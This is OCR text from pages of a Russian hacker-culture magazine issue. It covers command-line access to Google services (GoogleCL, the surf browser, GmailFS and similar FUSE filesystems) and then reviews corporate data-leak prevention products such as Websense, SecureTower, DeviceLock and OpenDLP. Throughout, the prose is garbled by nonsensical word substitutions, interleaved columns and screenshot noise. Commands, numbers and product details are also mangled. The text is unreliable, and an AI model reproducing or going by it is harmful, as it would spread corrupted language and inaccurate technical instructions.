<<Календарь>>, <<Контакты>>

получи

[Gmaill, Google Docs,

превращения веб-сайтов на приложения . До­

$ google youtube post --category \ Comedy yжoc.avi

Конечно же, возбраняется запускать равным образом относительно контроль­

ном скрипте

вместе с wеЬ- т ехноло г иями приложенийl, да его цвета полуют .

0. gтls<iir

браузера. Проект благословенно загнулся

[а сделал л равно т оч н ее, переро от нет слов фре йм на что до р ко про

$ gcp -f pdf \

$

приложений короче корпеть во Сети , а поль­ зователь сможет устраивать их получи рабочем

"Список покуnок"

Gmaill равно откроет страничк у во спринклер ре,

Picasa равным образом YouTube [только приложение видео!.

возьми которой должен п относительно дтвердить полномочия

Мы уж писали об этой утилите на одном с про­

Goog leCL

шлых номеров, пиита ому ваш покорнейший слуга далеко не буду возобновляться

следующих запусках сервиса сносно подключать

равным образом несложно приведу порядочно примеров ее ис­

равным образом объяснять никак не н у жно.

бери удаленное у правление. При по­

-7

Инструменты

-7

Создать

мещения ярлыка [рабочий кормежка и/или меню приложенийl, и- вуаля!- возьми рабочем столе появится ярлык, за клику получай котором

на обособленном окне откроется сайт без ненужных обвесок во виде кадастр браузера

да строк ввода/поиска . То а самое, причем даже изо командной строки, дозволительно выработать

пользования.

равным образом вместе с приложениями, установленными со по­

мощью Chгome

Публикация п ос та во благе со через

0.

Bloggeг:

Мы нашли массу приложений , способных

Web Stoгe [по клику правой

кнопкой мыши!:

сменять безвыгодный век способный веб-интерфейс

$ google. b.lagger с c:ti tJ.e 'Я в сЦ :.. 'Oткpt>UJ

рщt --Ьlog

'Linuxoid' \ Googlech l ' .--:tags ' linux, \ ДllЯ . ceбя _Google(:~, . \ .

...... Ы.а. с!:>lа, ..1;11а .: . Добавление перипетии во календарь:

0.

сер висов. Но который даже если в целях какого-то экзо­

$ chromium --app=http : //gmail.com

тического веб-сайта до этих пор малограмотный разработано нужного приложения либо существующие нам

Достаточно духовный предприниматель

никак не приглянулись [как вариант, понравился

окон сохраняет место равно размеры окна

банальный веб-интерфейсl ? В этом случае

на пороге закрытием равно восстанавливает его

позволительно приспособить технологию

Desktop web

appl i catioп, которая обеспечивает включение

нате прежнем месте присутствие следующем запуске.

Функция веб-приложения принимать равным образом во браузере Fiгefox. Здесь всё снова уймись : будет пере­

> youtube

vieыer

>

lnsert an YouTube Ul!l or search somethi ng .•. linux

0 2 3 4 5

-

Б -

0 В -

0 18 11 12 13 14 15 16 17 18 19 28

-

UberStudent 0/eview - liпux Distro 0/evieloJS lby lnflnitely6alactic ) ( 01 :58) Ubuntu 01 . 08 0/eview- linux Distro 0/evieloJS lby lnfinitelyGalactic) 013 : 02) How То Baclc:up Your Frugal Puppy Using Puppy linux lby icyos ) 083 : 06) Creating а DeЬian AIIM JМG for Archos - linux - Part 0 l by metalx1BBВJ ( 08 :56) linux Mint 02 0/evieы- linux Distro 0/evieloJS lby JnfinitelyGalact i cJ 012:41> linux is Better Тhan llindoloJS lby loclc:ergnome) ! B5:BBJ linux lby llhatYouDughtтoKnow) 084:32) linux Mint 02 0/evieы 0 LA5 0 s19eBB l by jupiterbroadcasting J 055 :49) Js Desktop linux Dead? 0 LAS 0 s19e84 lby jupiterbroadcasting ) 081:18 : 08! linux Opti11ization lby Jockergnome) 085:35) openSUSE 02 . 0 0/evieы 0 Тhе linux Action Sho"'! lby jupiterbroadcasting) (55:52) Pinguy OS 01 . 01! 0/evie"'- linux Oistro 0/evieloJS lby lnfinitelyGalacticJ 018 :44) llindoыs is Better Тhan linux lby loclc:ergnore) 084 :87) Fedora 05 0/evie"'- linux Oistro 0/evieыs l by InfinitelyGalactic) 019:17> Мessages from the linux Cшmunity lby ТhelinuxFoundationJ !85:B3 J linux Mint Cinnai!IOfl Desl<top early lool< Jan 08th 0812 lby linux4UnМe) 087 :56) Тhе Не"' Нui\Ьer One Distro? - linux Mint 02 lby gotЬletuJ 088 :1!3) IIIHOOIIS VISТA AEI/0 VS LIHUX UBUHТU BEI/Yl l by tearbd2J 084 :33 ) An lntro to linux Part 0: llhat is linux? !Тhis lleel< ln linuxJ !Ьу th i sыeelc:inlinux) 083:26) Fedora 06 0/eview- Linux Distro 0/evieыs (Ьу lnfinitelyGalactic) (87:57)

волочить favicoп сайта для эксплуатационный стол, равным образом ярлык появится самоуправно собой.

Зто истинно спокойный порядок созда­ ния веб-приложений в рабочем столе, же он не лишен некоторых недостатков. В частности, лично меня страшно напрягает, сколько присовокупление

хорошенького понемножку трудиться подо управлением на худой конец равно лишен­ ного элементов управления, так полноценного

веб-браузера вместе с плагинами, расширениями и во всем остальным совершенноненужным

во данном случае балластом, каковой всего-навсего сжирает парамнезия да процессори никак не слабит

неважнецкий пользы. Позтому моя особа рекомендовал

бы утилизировать пользу кого подобных задач более легкие решения, для примеру минималистичный браузер suгf. Браузер suгf основан бери движке

WebKit,

неграмотный имеет интерфейса равно управляется от помощью клавиатурных комбинаций . Это самый легко­ весный равно скорый с всех браузеров, основан­

Youtube-viewer- консольный скрипт в целях просмотра роликов вместе с YouTube

012

ных возьми полноценном НТМL-движке, а благодаря чего возлюбленный

ХАКЕР

03/158/2 01 0


Д остуча ть ся д по отношению н ебес

Sup- Мutt-подобный

заказчик про

Gmail

кристально годится чтобы запуска приложений.

(наnример , на поисках интересн что касается г об видео

Самый безыскусный тип его запуска выглядит

для

что-то около :

(например , про управления п по части чт ой ! равно ис­

YouTubel,

строить да прочь файлы

пользоват ь р азнообразные пер ен аправления ввода-в ы во в отношении да. Для тех а серв исо во Гугла

$ surf http:)/gmail.com

существ у е т ч етыре таких вирт уал ьных фай­ ловьlх со равным образом сте м ы получи и распишись основе

во него всего лишь узенькую полоску загрузки,

FUSE: Yout ubeFS, GDataFS, Gm aiiFS, Google Docs FS (ес ть еще goofs, только сие полузаброшен н ая Jаvа­

На экране появится интерфейс

Gmail

во аб­

солютно голом да чистом виде. Браузер добавит

# vi /etc/gmailfs/gmailfs.conf [account] username=usernamegmail.com password=параль [filesystem] linux_fs_4 fsname

которая отобразится во нижней части окна.

вещь l. Та кж е во Сети можн в отношении н айти f lickгfs ,

Чтобы показать нужные габариты окна враз

предна з н ач енн у ю чтобы загруз ки изоб ражений

вот промежуток времени запуска, дозволяется прибегнуть

нате flickг.co m равно MetaWeЫogFS. С ее в соответствии с мощью

у тилитой wmctгl:

можн относительно п ости ть на блоги непосредственно изо колтун андной

[logs] l evel=INFO logfile=- / gmailfs.log Затем н у жно примонтировать файловую систему:

строки .

Крат ко об пройдемся сообразно во всех отношениях фа й ловым

#!/Ьin/sh

surf http://gmail.com wmctrl -r surf -е ·e,se,se,4ee,зee· С крипт откроет

Gmail

размер окна равным

во окне suгf, сделает

000 х 000

равным образом разместит

его на левом верхнем углу, из отступом

00 направо

равно сверху. С через среды рабочего стола

системам равным образом попробуем проанализировать от я, для а ко равным образом х

использовать. Итак, Youtube FS !code .goog le. com/p/youtubefs/1 - файловая си ст ема на до­ ст у батман ко YouTube. Этой системы пропал во большин­

$ ./gma ilfs.py

allow_root

поnе

\

/ ход /до/каталога

Теперь перейдем для Google Docs FS (code. google .com/p/google-docs-fs/1 . Эта файловая

стве дистриб у тивов, всё же про ее у группировка что касается во для равно

концепция предоставляет дорога ко документам

порядочно от колебать не без; сайта тарболл равно распако­

Google Docs.

вать его . Пользоваться так:

равно как равно целое другие ФС во нашем обзоре:

$ ./youtubefs .py \

$ gmount

Использовать ее таково а просто,

скрипт мелочёвка обернуть на обозначение равно уместить

нате рабочем столе .

/ nуть / накануне /ка талог а

\

/ тракт / вплоть до /каталога

П осле сего на указанном каталоге появят­

После сего во катало г е появятся подката­ логи равным образом файлы во правильно таком но виде, на каком

Иногда удобнее малограмотный проэксплуатировать специаль­

ся всё-таки плей-листы равно каналы, получи которые

ные клиенты, а разбирать веб-сервисы

ть1 подписан . В каталогах твоя милость найдешь самочки

они представлены держи сайте

на виде азбучный файловой системы, идеже допускается

видеозаписи. Аналогичной функционально­

Документы не грех копировать, перемещать,

стью обладает

приобщать да удалять. Для отключения исполь­

бродяжничать со через файлового менеджера

net l,

GOataFS

( gdatafs . souгcefoгge .

которую не возбраняется сыскать на репазитариях

docs.google.com.

з уем команду gumouпt:

дистрибутивов. Синтаксис ее вызова не­

$ gumount

почем иной:

GOOGLEAUTH

$ gdatafs

l:i§l:lei!C!I

\

/путь)до/каталога

/ маршрут / до самого /к аталога

Веб-сервисы со п особны заступить только почто не

параль

что угодно настольное приложение. Их невыгодный нужно Недавно

Google

изменил способ

Файловая строй

GmaiiFS

( sг71 . net/

помещать равным образом обновлять. Они позволяют

аутентификации сторонних приложений,

pгojects/gmailfs /1 предназначена про монти­

никак не беспокои ть ся что касается сохранности данных равно на­

оттого на каждой программы lскрипта),

рования почтового ящика

строек . Однако самолично интерфейс веб-сервиса

ет получи и распишись основе протокола

может никак не подоспеть некоторым пользователям

работающей со аккаунтом

Google, nридется

Gmail. Она работа­ IMAP, оттого до

образовать особый nа функция . Для сего заходим

ее использованием придется подсоединить его

тож попасть жирно будет тяжеловесным не так — не то

нате страницу

https://www.goog le.com/set-

поддержку на настройках сервиса (Настрой­

назойливым. В этом случае удобнее об­

tings, дальше

выбираем оnцию << Авторизация

ки~ Пересылка да

ратиться ко специализированным клиентам

IMAPI.

nараль да задаем новоиспеченный nараль вместе с nомощью

конфиг

сnециальной фигура на конце страницы.

содержания :

03/158/2012

~Включить

После сего никуда не денешься сотворить

nриложений да сайтов ~Изменить», вводим

ХАКЕР

POP/IMAP

/etc/gmailfs/gmailfs.conf

следующего

равным образом файловым системам, которые, равно как твоя милость смог убеди ть ся, на достаточном количес тв е имеют­ ся в просторах Сети . :::И:

013


SYN/ACK

Гуля « gгindeг » Яремчук lgгindeгlё!synack.гul

БОРЬБА С УТЕЧКАМИ КОРПОРАТИВНОЙ ИНФОРМАЦИИ

-

Важныйэтап в развертывании

DLP

-внедрение, в отдельных случаях

В современном мире одним с ключевых экономических ресурсов является

информация. Кто ей владеет, оный полноте заключать успех, на в таком случае но период куляж данных практически денно и нощно означает потерю клиентов, а так да крушение компании . Именно

того теперича круглым счетом велодрын участие для DLР-решениям, позволяющим скрывать и предотвращать передачу конфиденциальной информации. Выбор большой, лидеры еще никак не сформировались, а предложения многократно схожи за функциям, только отличаются логикой работы да заложенными принципами, отчего устроиться неграмотный приближенно просто.

что поделаешь четко сформулировать требования и ожидания

равным образом «Обесnечить »

DLP

-

всеми данными чтобы

контроля .

Репозиторий

в целях

Ubuntu MyDLP- <tow_n_-

~111.edгatecb .

иm.lц!шn.tu .

ХАКЕР

03/158/2012

.


В поисках да н овраг д драчун

КАК ВЫБРАТЬ

DLP?

Информационная устойчивость стала одной изо структура л яющих дея­

тельности все одинаково какой компании, а соответствующие риски влияют получи и распишись ее рейтинг да очаровательность на инвесторо во . П что касается ста т истике, на е ­ роя т ность прибыль конфиде н циальной информа ц ии ради дейст во ий

сотрудника организации [и н балка д ера] превы ш ает вероят н восток ь уте ч ­ ки на результате взлома, вдобавок сие безграмотный обяза т ельно умышленные действия, читатель может случаем отпра на ить обложка далеко не тому адресату. Д что касается появления интернета наблюдать деятельнос т ь

ОШИБКА В РАБОТЕ

DLP

МОЖЕТ

ПРИВЕСТИ К БЛОКИРОВКЕ ВПОЛНЕ ЛЕГАЛЬНОГО ТРАФИКА И ПОМЕШАТЬ РАБОТЕ СОТРУДНИКОВ

сотрудников было почти что невозможно. Н ет, установить контроль, конечно, было реал ь но, а технических средс т на для автоматизации насчет ц есса невыгодный су щ ествовало. Сейчас всё изме н илось.

ражения да т. п.]. Хорошие системы, вроде правило, используют целое

Деловая переписка положено в соответствии с электронной почте, пользователи

доступные технологии , а распорядитель может несомненно организовывать

общаются чрез

устав единолично для основе подготовленных шаблонов .

lM

да

VoiP,

обмениваются файлами, ведут

блоги, публикуют сведения на сацсетях равным образом т. д. Все сии каналы

Кроме того, DLР-система должна оснащать службу безопасно­

нетрудно надзирать автоматически, интенсивность современных

сти инструментом про анализа всех событий равно архивом переданной

серверов да пароемкость носителей позволяют накоплять да обрабаты во ать

информации. Еще одним критерием, определяющим извлечение

материал во реальном времени. Ч тобы обнаружит ь да пре д отврати т ь

является вероятность не позволить утечку дан н ых на реальном вре­

передачу конфиденциальных данных держи разных сия п ахти [при пере­ меще нии, использовании равным образом хранении ] , применяется всеобщий сословие

мени. Однако специалисты когда как относятся ко этой функции,

систем защиты-

особенно для этапе ввода во вон как вместе с плуатацию] может родить ко бло­

DLP [Data Leak

Ргеvепtiоп] . На настоящее суще­

опять-таки погрешность во работе

DLP,

DLP [а ложные срабатывания случаются,

ствует до этих пор не без; десяток терминов-синонимов на таких сис т ем:

кировке весь легального трафика, а значит, спутать планы работе со­

[lпfoгmatioп

трудников . Поэтому многие администраторы предпочитают расследование

ILDP Leak Detectioп & Pгeveпtion], IPC [lnfoгmation Pгotection and Contгol], ILP [lпfoгmatioп Leak Ргеvепtiоп] равным образом др . Задача у них,

по части факту, а далеко не блокировку.

во общем-то, простая - мониторинг, равно д ентификация равным образом ограда .

Официальных стандартов, по части п ре д еляющих, который-нибудь д олжна бытийствовать

DLP,

WEBSENSE DATA SECURITY SUITE

доколе далеко не существует, потому разработчики nо-разному смо т рят

Са й т проекта :

для функции

Лицензия:проприетарная .

DLP.

Часто дозволено встретиться самые небо и земля реали­

websense.com .

зации, безвыгодный век включающие в самом деле необходимое или,

ОС из ервер :

наоборот, напичканные ненужным функционалом, добавлен н ым

ОС клиенты: Windows Vista , 0, 0003, 0008/R2.

за заказу компании. Однако со временем определились некотор ы е

Русифи ко ация: отсутствует.

требования, которыми следует иметь отличительной чертой полнофункциональное

Windows Server 0003 R2 .

Калифорнийская блок

Websense

недурно известна в качестве кого

DLР-решение. В первую каскад они касаются д иапазона возмож­

поставщик систем филырации веб-трафика, во частности,

ных каналов утечки:

во

электронная связь

[SMTP, РОРЗ, IMAP];

Facebook

через малое время хорошенького понемножку внедрена ее исследование в целях защиты быть

переходе объединение внешним ссылкам. Решения ориентированы на первую

программы обмена IМ/Vо iР -сообщениями равно Р2Р-клиенты; веб-ресурсы [социаль н ые се т и, форумы, бло г и], а да пере ­

черед сверху сре д ние да круnные компании со штатом с гаком

000

сотрудников равным образом государственные учреждения. Комплекс Webseпse

из-за счисление контроля основных каналов обмена д анными позволя­

предоставление файлов за протоколам НТТ Р, НТТ РS равным образом FТР ;

DSS

сетевая распечатка [SM В P гinting, NCP Pгintiпg , LPD, равным образом т. д . ]; внешние устройства [USB, CD/DVD, принтеры, Bluetooth, модемы и т. п . ], сетевые папки .

ет во реальном времени остановить утечку конфиденциальной ин­ формации . Он работает нате основе технологии цифровых отпечатков PгeciseiD, разработанной компанией PoгtAuthority которую

Websense

купила на

0006

году .

PreciseiD

Technologies,

обеспечивает вы­

сокую истинность обнаружения конфиденциальных данных равно далеко не име­

Характер п ередаваемых верно нн ых определяетс пишущий эти строки хорошенько обнару­

жения специфических признаков [метки, хе ш- фу-ты н кции, грифы ] и анализа контента [статистический анализ, регулярные кончать

ет некоторых недостатков лингвис т ических методов . Д анные опи­ сываются рядом помощи « цифрового отпечатка >>, представляющего

~.:._:=~ -~ ~-~-'"'-w ~~.--------,IЬ"',..=.-= ..:::~=·=-·- - - - - - - - - J ....

·-. --

0dl c.-c~

lii $~--

'""'""""!''!IIIIICI!I=a=ВI!!Iii!!IC=---~~==~

~~

.......

___

:IJ"ICO:u'lq~Yypts

---~ __.... • 0 • IG • \2 • 0 • • • '

~-~

'11"~... .._

,) 12 • 0 • • • '

• 0 • 'IO • Il

...... '!~"

__ .._

~~,._

--

к..---

в-

--

--

е

_

-----------

____

~~~-r,.",

.

-

! в.:-

.-

.

01Ь!88!-=- • 0rь.-.

ее

• - Р--а - з.--

Н аст поток ка разреше н равным образом й во

ХАКЕР

03/158/2012

DeviceLock Endpoint DLP Suite

Установл е нны й

DeviceLock DLP из лошаденка жит гряда

го так во ых n рав вилайет

015


SYN/ACK

WEBSENSE DSS ОПРЕДЕЛЯЕТ РЕАКЦИЮ НА ИНЦИДЕНТ ЛИБО ТРЕБУЕТ ПОДТВЕРЖДЕНИЯ ОТ ОТВЕТСТВЕННОГОСОТРУДНИКА

Websense Web 0ecuгity Gatewayl. П оддерживается соединение · с Act ive Diгectoгy, Novell eDiгectoгy равно Lotus Domino. Совместно с Websense 055 используется цепь других приложений, рас ш иряю­ щих внутренние резервы комок пл екса DLP: Data Еndроiпt-устанавливается для конечные П К, идеже контро ­ лирует данные, передаваемые чрез U5B да близ печати, попытки сделать скриншоты экрана, сведения lM равно т. д . ; Data Мопitог - осуществляет оценка каналов передачи, · чтобы об п ределить, кто, куда, равно как равным образом ась? с пр авляет, да сопостави ть с политиками равно бизнес-процессами, снижая риски;

Data Ргоtесt-включает Data Мопitо г, автома т ически блокирует собой ассортимент символов не в таком случае — не то слов документа тож со д ержимо го полей

утечку данных нате основе политик;

БД. Такой по мнению д аллюр обеспечивает точную классификацию контента

Data Discoveг- содержание пользу кого поиска равным образом классификации конфи­

паче нежели интересах 000 форматов до самого кументов (включая та блицы СУБ Д

денциальныхданных, которую не возбраняется проэксплуатировать равно как на составе

равным образом сжа твоя милость е файлы ! , ага а когда информация перенесены либо конвертиро­

055, приблизительно да отдельно, никак не требуетустановки агентов.

ваны на видоизмененный формат. Кроме PгeciseiD, используются иные алго­ ритмы : словари, точное да частичное совпадение, статистический

Для управления всеми решениями Websense используется

расследование равно т. д. Вместе от тем для того анализа информации на продуктах

единая модильон Websense TRITON Coпsole (Java равно Apache Tomcatl.

Websense nрименяется порядком технологий Deep Content Сопtгоl

Websense 055 куда прямо устано скручивать . В картотека ранее входит М5 0QL 5ег v ег Expгess 0008 R2, однако к больших сред паче ис п ользовать

равным образом T hгeat5eekeг (сканирова н ие веб-сайтов да вскрытие новых угроз).

полную версию. Первоначальная набор политический деятель производит­

П роизводится оценка основ н ых каналов передачи: элек­

тро нн ой почты (5М ТР ), сообще ний М5 Exchange, НТТР/НТТР5, FТР, IM/M5N . П редусмотрена объединение по части ICAP вместе с любым да нт ернет­

ся около помощи без труда г об мастера, создающего шаблоны из учетом страны да харак т бретер деятельности организации, во волюм числе имеют­

ся равным образом региональные настройки про России .

шлюзом, поддерживающим сие т п ро т окол. Для мони т оринга сервер

FALCONGAZE SECURETOWER

Websense может учреждаться на порыв alias использовать зеркалирование трафика (5PANI. Websense 055 ав т оматически определяет реакцию получай инци­

Лицензия:nроnриетарная.

дент либо требует подтверж д ения с в рассуждении тв етственно г насчёт сотрудника.

ОС сервер:

Система умеет противодействовать передачу конфиденциальных данных,

ОС клиенты:

исполнять письмо !специалисту службы безопасности,

Русификация: есть.

Сайт nроекта:

начальнику либо — либо владельцу контентаl, шибать внешнюю про­

falconqaze.ru .

Windows 0003/2008lx86/x64). Windows XP/Vista/7/2003/2008lx86/x64).

Относительно молодое решение, разраба тыв аемое россий­

грамму, отправлят ь запрашивание н а п од тв ерж д ение отправки да др.

ским 000 «Фальконгейз>> . П редставляе т лицом программный

Система присваивает ан ц иде нт у у никальны й боец равным образом прикрепля­

продукт, использующий пользу кого поиска конфи д енциальной инфор­

ет для сообщению файл. Администратор задает г ибкие политики

мации технологии контентного, а три бутив н ого да ста ти вместе с т ическо­

не без; учетом предпринимательство -проц ессов колтун п ании, а во комплекте поставки еще

го анализа (ключевые слова, регулярные выражения, отблеск

не без этого порядком д еся т заговор шаблонов равным образом н астроенных отчетов

равным образом т. д.) . Обеспечивает инспекция всех популярных каналов прибыль

за инцидентам равно активности п ользовате л ей. Продукты Websense

данных, на книга числе в рассуждении т слеживает следовать ш ифрова нны й пробка

отдельных сотрудников другими словами групп, защищают корпоративную

(НТТР/5, FТР/5, РОРЗ/5, 0МТР/5, IMAP, 05CAR, ММР, M5N, XMPP I Если на организации используется М5 Exchange 0007/2010, в таком случае весь

документацию через внесения несанкционированных изменений.

внутренняя равно внешняя переписка вдобавок проверяется возьми соот­

Остальные внутренние резервы включают п ринудительное зашифровка

ветствие политикам. Особо свербит экстрагировать полную поддерж­

позволяют локализировать теледоступ ко опре д еленным сведениям чтобы

электронной п оч твоя милость (ч ерез шлюз! да совместную работу от други­

ку 0kype, однако 0есuгеТоwег может есть голосовой

ми продуктами Websense (напр имер, со шлюзом безопасности

трафик, текстовые сообщения, файлы да отправляемые 0М5.

ВОЗМОЖНОСТИ

OPENDLP

Проект OpenDLP lc ode.google .com/p/

помощи SSL !используется libcuгl) . Настройку

(nолучать перечень файлов, на которых найдены

~1 предлагает странность инструментов

большого числа агентов упрощают профил и,

совпадения) равным образом править работой агентов

про nредотвращения возможных утечек

содержащие инструкция сканирования.

!пауза сканированияидеинсталляция

информации со клиентских машин,

В идеология х на описания объектов поиска

агента) . В текущей версии неграмотный производится

работающи х перед управлением Windows . Для сего нате подчиненных комnах

используются Регl -со вместимые регулярные

проелушивание сетевого трафика, а вот и все

выражения , позволяющие открывать

разбирательство информации, копируемой получи наружный

устанавливается маленький агент.

н по отношению критерий кредиток равным образом паспортов ,

Само раскатывание производится

пароли, показывать существование бери ресурса х

документы на текстовом формате, хранящиеся

на автоматическом режиме после Netblos/SMB .

документов от конфиденциальными данными

возьми жестком диске комок шаг . Проект доколе

Кроме того, как ми видится прямое просмотр

да изучать их обработку возьми внешних

находится во стадии активной разработки .

систем помимо установки агентов на

Windows !через SMB), *niх-системах ISSH) да СУБД IMS SQL да MySQL). Централизованное правление

сервисах IGoogle Docs , Gmail) . Администратор

Первая издание по-под номером

может настроить темнокожий равно покойник наличность

на апреле 0010-го, текущая версия-

каталогов в целях сканирования да показать

Серверная порция написана возьми языке Регl , ради

осуществляется рядом помощи веб - интерфейса,

отслеживаемые расширения файлов .

установки разработчики рекомендуют

товарообмен данными не без; агентом производится

В сегодняшний день эпоха интерфейс позволяет

равно

по части каналу связи, зашифрованному подле

просматривать результаты сканирования

016

SSN ,

рупор эпохи , проект проверяет всего лишь

0.1

представлена

0.4.3 .

Apache Linux, чтобы х ранения данных используется MySQL. Агент написан бери языке Си. Исходные

ХАКЕР

03/158/2012


В поисках инсайдера

р

• "--R- м.. - ..,.. _ · -

~~~~~~--------------=~~ lti!Ar. ......

~

• .__w.._........,."...._......,.....,.._..,......,.,.r...,__.._._.._• ._,._w.,_.._.._ ... ___ ....,.

в рассуждении --

- ·-

.

М! Dq!t!aR "' !:t_. "'D ,em

fQ ~

0Z!SIПa

wш~·

-..-.

_.,_._.......,.., _ _

...-~

rQ ~Scnll

0]iO.J5

_",_.._,

I!Xm!Ncr!SIOWdnмA'ft•l

0tJ ~

$acll

d4J'S

~.,.,._._.,.._,...1....

0[) ~

0о1:С

~

~.,*~,._

~$tp!trdeмi'И1

~==::

~

'4 ~$atlt

WtteqsJEJrtd;IQattr«di!

ro ~

~

r{J ,....... ~

IQ!StqyyD9!\'Ьrdцr+1

--=. . _. "'~

~ '""""*-1

r/J ~

.S0i1t

:::

s.r.

...us

Scr1>l

0835

=::~=-==..:= О.С.. .................. . _

_ . , ....... ......., ..... Н-

031815

_"'._..,. ........... ~ ~., . . . . . - - - - . . . . :к...

~

_ _ ., ............... >d.-

==::

....

r/J ............... ...._ t,Q .......,. --~

t.JI0]5

- < t i - S 0 ........... 0.~

0.J80J5

~--.и--

riJ ~ ....,.е._

dD35

":J ~

~

&.us

~

lt} ........... _ . ,

018)5

_.,s.-.8r~~

~

~~ ~

08И

~"!~~~~

....... -1~---

ИQmAgpiJ!tyrlwм'tJ•ppt

Шаблоны

~"'-'

0IIQ.ta

wн.rurnмt!Qnмtю!aJ

............ .......... """''"' .......

•-

~

АФ!оr•м•и•n

NA«n " F«f·''"A

..""*"•

0cпJrnltetcт....twu-nl,.......'i'nч•

~

:g:::

rD"""""*'"" - . - . . . !/J """"*-1 ._...е.-

гггг ~ · J

~ ~

В об

____

~-

·-·

~ Sllld . . ........, ................... _~ ........... ..... s

~ --

~ ............ ~.-.......... -

~-- ... .u.a!8

• 01111D

____ .. _..,_

... ",. ..... . , . - . . . ..... ..,.__

~ .... - - - -

...

~ ~ l"'::ler.............. ..._., ~."..

,."

c-.-e::IIO.. " - • ""'--_..., ...........-..

-

..... c.-oм-a: ... ......,JJ L-Qoo81:0'8_.._ . . . . . .

=--........- . . .

-..:..,_ ... ...".а-м-. -----~-t.al

::::::~:::::.=.-.:.

-fii...-И168it_.........._ _ " ,..u...,..._..~ -r~-- IIIIW>•-

.

_.,s...a,~~

гггггг- ,.-

Выбор nолитики во рента

Websense DSS

Не по сию пору DLP сие умеют иначе говоря обеспечивают во полном объеме !чащ е ус тановленный ходок контролирует всего только текстовые сообщения].

J ...... _ ,..__. ..... a.

Websense Data Security Suite

ния куда пр ос т , ради управления , создания правил равно анализа

испо льз уется консо ль администратора

Falcongaze SecuгeToweг Falcongaze SecuгeToweг

Перехват трафика может бытийствовать настроен выборочно: по части IР­

Admiп Coпsole равным образом консо ль безопасности

адресам сиречь диапазонам, МАС-адресам, п ортам равным образом протоколам,

Clie nt.

логинам, размеру файлов равным образом т. д. Система распознает защи­

щенные движение роле м документы MS Woгd/Excel, PDF да кое-кто

правил , позволяющих обнаружить отправку ряда данных !номеров кредиток, ИН Н ], экскурсия соц со етей, отправку экстракт для того по­

типы архивов. Когда читатель отправляет грамота не в таком случае — не то

иска новой работы да др .

В усик тановленной системе темпераментно сколько-нибудь общих

архив, экранированный шаг ролл ем, возлюбленная генерирует явление да предо­ ста вляет администратору полную информацию равным образом копию файла.

DEVICELOCK ENDPO INT DLP

SUIТE

SecuгeTo weг контролирует причина , копируемые получай внешние

Сайт nроекта:

усишко тройства , литература получай локальных равным образом сетевых принтера х. Чтобы

Лиценэия:nроnриетарная .

избежать ошибки около опре делении отправителя, SecuгeToweг, кроме общепринятой информации, павел уче нной с домена ,

ОС сервер: Windows NT/2000/XP/2003/Vista/2008/7. ОС клиенты: Windows NT/2000/XP/Vista/7.

анализирует безвыездно контактные данные, IР-адрес равно век его

Русификация: ест~

использования, логин на различных месседжерах равным образом т. п. Дал ее

devicelock.com/ru .

Система

DLP, построенная Oevicelock, которое

для основе по со таточно известного

общественный порядок заводи т переанальные карто чки , не без; через которых

решения

весь собранная катамнез привязывается ко учетным записям

сту батман пользователей для различным периферийным устройствам.

!возможна объединение от Active Diгe ctoгy ].

Device loc k разрешает/блокирует подход вместе с учетом следующих

Кроме того , SecuгeToweг имеет функции, неграмотный специфичные в целях

DLP,

а сильно востребованные на большинстве организаций. Та к,

от ее через позволительно удостоверять работу сотрудников- си ­ стема подчас делает скрины эка ранов для того плацента ую щ е го

просмотра на х ронологическом поряд ке, что касается т слеживае т внутренние

используется чтобы контроля до­

параметров: логина, типа, времени суток , формата файлов и т. д . Сейчас сие основополагающий элеме нт системы

DLP,

инкорпорированный

относительно пциональным равным образом модулями Netwoгklock !анализ данных , пере­ дава емых по части бредень ] равно Coпtentlock !собственно, отвечает после ана­ лиз равным образом филырацию данных]. Благодаря новым возможностям научился блоки ровать усишко тройства , отслеживая во томик

равным образом внешние контакты. При этом формируются наглядные интерак­

Deviceloc k

тивные отчеты, сообразно зволяющие во дина мике рассматривать следовать сетевыми

числе равным образом со д ержимое коп ируемы х данных , а отнюдь не только лишь логин

соб ытиями равным образом активностью отдельных пользователей. На основе со­

п ольз ователя равным образом накипь стандартные норма . При этом раз­

канделябр нны х данны х весть усилий спрятать , почем времени сотрудни для

ные политики обычай навливаются на зависимости с того, работает

потра тил получи и распишись безделица общение, прен ебрегая своими служебными

комок пьютер на бредень не так — не то автономно !оперативный равно автономный режимы]. Система обстоятельно протоколирует всё-таки образ действий поль­

обяза нн остями, равным образом рано или поздно сие имело место. Функционально SecuгeToweг состоит изо нескольких компонентов:

зова телей равно осуществляет выборочное теневое резервирование

се рв ер перехвата трафика- захватывает тенетный движение

данных чтобы анализа . Она распо з нает сильнее

равно пер е так точно ет его на баз у данны х интересах х ранения !наибо лее требова­

равным образом использует до некоторой степени механизмов анализа контента: отыскание

тельны й для ресурсам компонент];

по мнению ключе вас м словам да шаблонам , во томище числе вместе с поддержкой

00

типов файлов

сервер контроля рабочих станций- используется ради развер­

регулярных выражений !номера кредиток, адреса, паспортные

тывания агентов получай работники станции, мониторинга их работы

причина равно т. д . ], словари, сканирование по мнению свойствам файлов равно данных

равным образом сбора информации, п ерех вач енной агентами lв томик числе шиф ­

!название, размер , шаг роль, слова да др.]. Благодаря этому DLP

рованного трафика равным образом данны х касательно работе вместе с внешними устройствами];

может разыскать текст, сп рятанный, например, во графических фай ­

сервер обработки информации-выполняетобработку, индекса­ цию да изучение данны х, развертка , отправкууведомлений, формирова­

лах . Реализованы белые списки !списки устройств равным образом протоколов и временные списки], позволяющие пользователю безо проблем

ние отчетов да пр .

п олучи ть до самого от туп. Возможна объединение не без; ме ха низмами шиф­ рования Bitlockeг То

В качестве СУБД может бытовать использован Огасlе,

SQLite

MS SQL

Sегvег,

равным образом PostgгeSQL. Система мелочёвка масштабируется, подле

Go, PGP,

ТгuеСгурt равно некоторыми другими .

Таким образом, позволено допустить вносить определенные док уме нты всего-навсего возьми защищенные носители . Клиентская пай

необходимости на козни позволено впредь до бавит ь н овый сервер, отвечаю­

и контролирует ягодицы обмена , PгintScгeeп , литература докумен­

щий вслед за перехват иначе обработку данных. Пр оцесс развертыва-

тов равным образом обнаружи вает работающие кейлоггеры.

ХАКЕР

03/158/2012

017


SYN/ACK

l'{j i..--UO'd-.....

-........ _,..._...,., т о...•• -~-.,....~--·""'-

~ ln.W.""~;ММ'

'\1ooooohold-ro.~,

~ lnoblo !INIМ. .....

n-ohold-fo<r.ь ......

0

_

z

""-·--,...-....., O ln .W..I'I- IM"f~

l11нo•МW-•""'f""' ..... '

l.] ln.W..UII.IUitO~

'"-•l>old-'--...,..• 0

Q ln_ТU.W..,ID,..._

"""''""""-"""~ ' -,

